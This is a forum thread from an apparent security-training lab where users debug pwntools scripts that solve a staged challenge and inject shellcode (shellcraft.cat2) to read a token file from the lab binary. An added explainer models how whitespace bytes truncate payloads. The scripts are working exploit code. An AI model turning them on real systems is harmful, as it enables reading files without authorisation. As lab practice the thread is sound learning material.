Forum Discussion
I'm having real difficulties with this one. If I run it locally on my host, I am able to return my own token, but I get a seg fault. If I then move it across to remote using socat, I do not get the token returned. This is what I have:
from pwn import *
import re

context.arch = 'amd64'
context.os = 'linux'


def main():
    r_tube = process("/opt/demonstrate-challenge")
    r_tube.recvuntil(b"The output may not display correctly in a terminal, so it may be safer to print it as a hexdump.")
    # cat2: open/read/write the file to fd 1, then a clean ret
    shellcode = shellcraft.cat2('/home/token-user/token.txt', 1, 40) + shellcraft.ret(0)
    shellcode = asm(shellcode)
    r_tube.send(shellcode)
    data = r_tube.recvall(5)   # 5-second timeout
    print(hexdump(data))


if __name__ == "__main__":
    main()
I've tried the shellcode every which way and, as I say, I can get it locally but not remotely. Trying to run it on socat through my dev box, it fails as well, so I suspect it's something with socat that's not working as I expect. Wouldn't mind a nudge, as I've spent a few months on and off on this to no avail.
I think there are some steps missing in your code. Go up, take the provided code, make the adjustments in the replies, and it should work.
- talnet23 2 months ago
Bronze I
Thanks for coming back to me. Sorry, I removed some of the steps for brevity, but this is the full code that works fine locally but not through the remote connection:
from pwn import *
import re

context.arch = 'amd64'
context.os = 'linux'


def main():
    r_tube = process("/opt/demonstrate-challenge")
    #r_tube = remote("127.0.0.1", 1234)

    print("Stage 1")
    r_tube.recvuntil(b"What is the sum of")
    line = r_tube.recvline().decode()
    nums = [int(x) for x in line.strip().replace('?', '').split(' and ')]
    answer = nums[0] + nums[1]
    r_tube.sendline(str(answer).encode())

    print("Stage 2")
    r_tube.recvuntil(b':')
    r_tube.recvline()
    line = r_tube.recvline().decode().strip()
    val1, val2 = [int(x) for x in line.split(" and ")]
    packed = p32(val1) + p32(val2)
    r_tube.send(packed)

    print("Stage 3")
    elf = ELF('/opt/demonstrate-challenge')
    parsing_check_addr = elf.symbols['parsing_check']
    r_tube.sendline(str(parsing_check_addr))

    print("Stage 4")
    shellcode = shellcraft.cat2('/home/token-user/token.txt', 1, 40) + shellcraft.ret(0)
    shellcode = asm(shellcode)
    r_tube.send(shellcode)
    data = r_tube.recvall(5)
    print(hexdump(data))


if __name__ == "__main__":
    main()
Again I get a SegFault with this, and copying the code above I get a SegFault too; both provide the token.txt locally but not through the remote connection.
- IotS2024 2 months ago
Bronze III
Okay :) For me the following worked (just a part):
from pwn import *  # import implied by the snippet below; added for completeness

# Generate shellcode to read the file using pwntools shellcraft
context.arch = "amd64"

# Generate shellcode using shellcraft to read file and print the content as hex
shellcode = asm(shellcraft.cat2("/home/token-user/token.txt"))

# Print out the shellcode in hexadecimal for easy inspection
print("Generated Shellcode:")
print(shellcode.hex())  # Print shellcode in hex format for debugging

# Send the shellcode payload (conn is the tube opened earlier; not part of this excerpt)
conn.sendline(shellcode)
I tried a lot of different approaches until I found this one. Try it out.
It is the arch and an easier shellcode generation.
- talnet23 2 months ago
Bronze I
Ok, my brain hurts! Running that code locally on my machine through socat or through spawning a local process, nothing. However, when running it in the Immersive Lab environment, I get the token back. At least others have been able to work that out. Thanks, completed PwnTools now.
- netcat 2 months ago
Silver II
I had to use encode to get rid of tab, space and other characters.
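The last reply's point about tab, space and other characters is the usual reason a payload behaves differently from one setup to another: if the receiving program reads its input with a text-oriented C function, any payload byte that happens to be whitespace ends the read early, while a raw read() passes everything through. As an added example (not code from this thread, and not using pwntools), this pure-Python model with a constructed payload lists the bytes that would trip such a reader and shows how much of the payload read(), fgets() and scanf("%s") would each hand to the program after a sendline().

```python
# Added example, not from the thread; pure Python, no pwntools needed.
WHITESPACE = frozenset(b" \t\n\r\x0b\x0c")  # bytes C's isspace() treats as separators

# Constructed stand-in for assembled code (an exit syscall with three awkward
# bytes spliced in). Not real shellcode and not taken from the thread.
SAMPLE_PAYLOAD = (
    b"\x48\x31\xc0"                  # xor rax, rax
    b"\x48\x89\xe7"                  # mov rdi, rsp
    b"\x09\x20\x0a"                  # tab, space, newline: the problem bytes
    b"\x48\xc7\xc0\x3c\x00\x00\x00"  # mov rax, 60
    b"\x0f\x05"                      # syscall
)

def find_whitespace_bytes(payload: bytes) -> list:
    """(offset, value) for each byte a text-mode reader treats as a separator."""
    return [(i, b) for i, b in enumerate(payload) if b in WHITESPACE]

def sendline(payload: bytes) -> bytes:
    """What tube.sendline() puts on the wire: the payload plus a trailing newline."""
    return payload + b"\n"

def read_reads(stream: bytes, n: int) -> bytes:
    """Model read(fd, buf, n): raw bytes, no byte is special."""
    return stream[:n]

def fgets_reads(stream: bytes, size: int) -> bytes:
    """Model fgets(buf, size, f): up to size-1 bytes, stopping after the first newline (kept)."""
    chunk = stream[:size - 1]
    nl = chunk.find(b"\n")
    return chunk if nl < 0 else chunk[:nl + 1]

def scanf_s_reads(stream: bytes) -> bytes:
    """Model scanf("%s", buf): skip leading whitespace, copy until the next whitespace byte."""
    i = 0
    while i < len(stream) and stream[i] in WHITESPACE:
        i += 1
    j = i
    while j < len(stream) and stream[j] not in WHITESPACE:
        j += 1
    return stream[i:j]

if __name__ == "__main__":
    print("separator bytes:", [(o, hex(v)) for o, v in find_whitespace_bytes(SAMPLE_PAYLOAD)])
    wire = sendline(SAMPLE_PAYLOAD)
    for name, got in (("read", read_reads(wire, len(SAMPLE_PAYLOAD))),
                      ("fgets", fgets_reads(wire, 64)),
                      ("scanf %s", scanf_s_reads(wire))):
        print(f"{name:8s} delivered {len(got):2d}/{len(SAMPLE_PAYLOAD)} bytes; intact={got == SAMPLE_PAYLOAD}")
```

Running find_whitespace_bytes() over an assembled payload before sending it tells you whether an encoder is needed at all, and which reader model applies depends on how the target program actually consumes stdin.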